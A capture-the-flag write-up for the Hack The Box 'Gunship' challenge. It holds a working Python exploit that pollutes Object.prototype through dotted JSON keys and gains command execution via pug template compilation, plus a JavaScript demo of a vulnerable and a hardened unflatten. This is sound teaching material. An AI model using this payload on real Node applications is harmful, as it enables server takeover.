https://app.hackthebox.com/challenges/245

Description

A city of lights, with retrofuturistic 80s people, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page to the British synthwave band called Gunship. 🎶

Exploitation

#!/usr/bin/python3
# Prototype pollution to remote code execution against Gunship.
# The submit handler unflattens dotted JSON keys into nested objects, so the
# key "__proto__.block" ends up as a property of Object.prototype. The pug
# template compiler then finds that polluted `block` node on every AST node
# that has no own `block`, and its debug bookkeeping concatenates the node's
# `line` into the generated JavaScript verbatim, which is where the command
# below runs.
import requests
import sys


def get_base_url():
    if len(sys.argv) != 2 or ':' not in sys.argv[1]:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':', 1)
    # No trailing slash: the paths below begin with one, and the original
    # "/" + "/api/submit" produced a double slash.
    return f"http://{host}:{port}"


TARGET_URL = get_base_url()

# The handler only renders the template for artist names it recognises;
# Gingell is one of them. The command writes the flag into the static
# directory because the response itself does not echo command output.
payload = {
    "artist.name": "Gingell",
    "__proto__.block": {
        "type": "Text",
        "line": "console.log(process.mainModule.require('child_process')"
                ".execSync('cat flag* > /app/static/out').toString())",
    },
}

r = requests.post(TARGET_URL + '/api/submit', json=payload)
print(r.status_code)
print(r.text)

# Fetch the command output the polluted template wrote to disk.
print(requests.get(TARGET_URL + '/static/out').text)
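The pollution step, as an added example that is not the challenge's code and not the flat library's: a minimal dotted-key unflatten of the kind the submit handler relies on (the dotted keys in the payload are the tell), shown in its vulnerable form and in a hardened form, run against a constructed payload shaped like the one sent above. The function names, the PAYLOAD sample and the FORBIDDEN list are assumptions made for the demonstration.

```javascript
'use strict';
// Added example, not the challenge's code and not the `flat` library.

// Constructed sample input, shaped like the exploit request above.
const PAYLOAD = {
  'artist.name': 'Gingell',
  '__proto__.block': { type: 'Text', line: 'console.log("polluted")' },
};

// Vulnerable: walks each dotted path, creating intermediate objects.
// For "__proto__.block", cur["__proto__"] resolves to Object.prototype
// (an existing object), so the final assignment lands on every object.
function unflattenUnsafe(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      if (typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) {
        cur[parts[i]] = {};
      }
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Hardened: reject the three segments that reach the prototype chain, and
// build on null-prototype objects so "__proto__" is never a special name.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

function unflattenSafe(flat) {
  const out = Object.create(null);
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    if (parts.some((p) => FORBIDDEN.has(p))) {
      throw new Error(`rejected key "${path}"`);
    }
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      if (typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) {
        cur[parts[i]] = Object.create(null);
      }
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// An object created before the request gains a `block` property after the
// vulnerable unflatten runs. Cleans up so the rest of the process is unaffected.
function demoPollution() {
  const victim = {};
  const before = victim.block;
  unflattenUnsafe(PAYLOAD);
  const after = victim.block;
  delete Object.prototype.block;
  return { before, after };
}

// The hardened parser rejects the payload but still accepts the legitimate
// dotted key, and leaves Object.prototype untouched.
function demoHardened() {
  let rejected = false;
  try {
    unflattenSafe(PAYLOAD);
  } catch (e) {
    rejected = true;
  }
  const ok = unflattenSafe({ 'artist.name': 'Gingell' });
  return { rejected, artistName: ok.artist.name, stillClean: ({}).block === undefined };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demoPollution());
  console.log(demoHardened());
}
```

The unsafe version is what makes the single request above sufficient: no object on the server has to be touched directly, because the gadget is read through the prototype chain by code that never expected `block` to be set.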

Summary

Gunship: the submit handler unflattens dotted JSON keys into nested objects without rejecting __proto__, so a single request pollutes Object.prototype; the polluted block object is then picked up by the pug template compiler, which concatenates the attacker-controlled line into the generated JavaScript, giving command execution on the server and a way to write the flag somewhere readable over HTTP.